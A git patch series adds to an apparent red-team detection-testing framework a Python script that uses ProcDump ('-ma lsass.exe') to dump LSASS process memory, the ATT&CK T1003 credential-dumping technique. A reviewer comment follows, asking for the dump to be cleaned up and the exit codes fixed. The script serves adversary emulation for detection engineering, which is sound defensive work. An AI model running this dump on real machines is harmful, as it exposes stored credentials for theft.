From 2721f150d055a9cc0d34595c3662fba35c3da885 Mon Sep 17 00:00:00 2001 From: ForensicITGuy Date: Thu, 10 Jan 2019 17:46:45 -0600 Subject: [PATCH 1/2] t1003 - Dump LSASS with ProcDump --- README.md | 2 +- red_ttp/common.py | 1 + red_ttp/lsass_memory_dump.py | 40 ++++++++++++++++++++++++++++++++++++ 3 files changed, 42 insertions(+), 1 deletion(-) create mode 100644 red_ttp/lsass_memory_dump.py
diff --git a/README.md b/README.md
index 91a002d..aa09823 100755
--- a/README.md
+++ b/README.md
@@ -24,7 +24,7 @@ The following table provides dependency information:
 | Dependency | RTAs | source |
 | --- | --- | --- |
-| Sysinternals Suite | user_dir_escalation.py, sip_provider.py, system_restore_proc.py, trust_provider.py | [Microsoft](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) |
+| Sysinternals Suite | lsass_memory_dump.py, user_dir_escalation.py, sip_provider.py, system_restore_proc.py, trust_provider.py | [Microsoft](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) |
 | MsXsl | msxsl_network.py | [Microsoft](https://www.microsoft.com/en-us/download/details.aspx?id=21714) |
diff --git a/red_ttp/common.py b/red_ttp/common.py
index c7c8213..bc2f896 100755
--- a/red_ttp/common.py
+++ b/red_ttp/common.py
@@ -313,6 +313,7 @@ def check_system():
 PS_EXEC = get_path("bin", "PsExec.exe")
+PROCDUMP = get_path("bin", "procdump.exe")
 def run_system(arguments=None):
diff --git a/red_ttp/lsass_memory_dump.py b/red_ttp/lsass_memory_dump.py
new file mode 100644
index 0000000..8647351
--- /dev/null
+++ b/red_ttp/lsass_memory_dump.py
@@ -0,0 +1,40 @@
+# Name: Dump LSASS Memory with ProcDump
+# RTA: lsass_memory_dump.py
+# ATT&CK: T1003
+# Description: Uses Sysinternals ProcDump to dump the memory space of lsass.exe.
+
+import common
+import os
+import errno
+
+DUMPFILE = "C:\Windows\Temp\RTA\lsass.dmp"
+@common.dependencies(common.PROCDUMP)
+def main():
+
+ common.log("Ensuring dump folder exists...")
+ if os.path.exists(os.path.dirname(DUMPFILE)):
+ common.log("Dump folder exists, moving on!")
+ else:
+ common.log("Dump folder doesn't exist, creating...")
+ try:
+ os.makedirs(os.path.dirname(DUMPFILE))
+ except OSError as e:
+ if e.errno != errno.EEXIST:
+ common.log("Failed to create dump folder!")
+ raise
+ common.log("Executing procdump.exe...")
+ code, output = common.execute([@common.PROCDUMP, "-accepteula", "-ma", "lsass.exe", DUMPFILE])
+ if code == 0:
+ common.log("Successfully executed procdump.exe!")
+ else:
+ common.log("Failed to execute procdump.exe.")
+ if os.path.exists(DUMPFILE):
+ common.log("Successfully created " + DUMPFILE)
+ else:
+ common.log ("Failed to create " + DUMPFILE)
+
+if __name__ == "__main__":
+ exit(main())
From 6617247e04fab385f06912565b53b6a8db84127d Mon Sep 17 00:00:00 2001 From: ForensicITGuy Date: Sun, 13 Jan 2019 18:01:47 -0600 Subject: [PATCH 2/2] Fix syntax issue --- red_ttp/lsass_memory_dump.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/red_ttp/lsass_memory_dump.py b/red_ttp/lsass_memory_dump.py
index 8647351..f50547d 100644
--- a/red_ttp/lsass_memory_dump.py
+++ b/red_ttp/lsass_memory_dump.py
@@ -24,7 +24,7 @@ def main():
 raise
 common.log("Executing procdump.exe...")
- code, output = common.execute([@common.PROCDUMP, "-accepteula", "-ma", "lsass.exe", DUMPFILE])
+ code, output = common.execute([common.PROCDUMP, "-accepteula", "-ma", "lsass.exe", DUMPFILE])
 if code == 0:
 common.log("Successfully executed procdump.exe!")
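Review bot: `main()` leaves the LSASS dump on disk — `DUMPFILE` is only checked for existence and logged, never removed, so each run of this RTA parks a full memory image of lsass.exe (the credential material that makes T1003 worth detecting in the first place) under `C:\Windows\Temp\RTA`. The telemetry of interest is the `-ma lsass.exe` invocation itself, so add `os.remove(DUMPFILE)` right after `common.log("Successfully created " + DUMPFILE)` (or whatever cleanup helper `common` already provides; it is not visible from this hunk). `DUMPFILE` should also be a raw string, `DUMPFILE = r"C:\Windows\Temp\RTA\lsass.dmp"`: the literal only works today because `\W`, `\T`, `\R` and `\l` are not recognised escapes, and a lower-case `\temp` or `\rta` would silently turn into a tab or carriage return. Finally, every failure branch falls through to an implicit `None`, so `exit(main())` reports success even when ProcDump fails or no dump appears; a `return 1` in the two failure `else` branches makes the exit status honest.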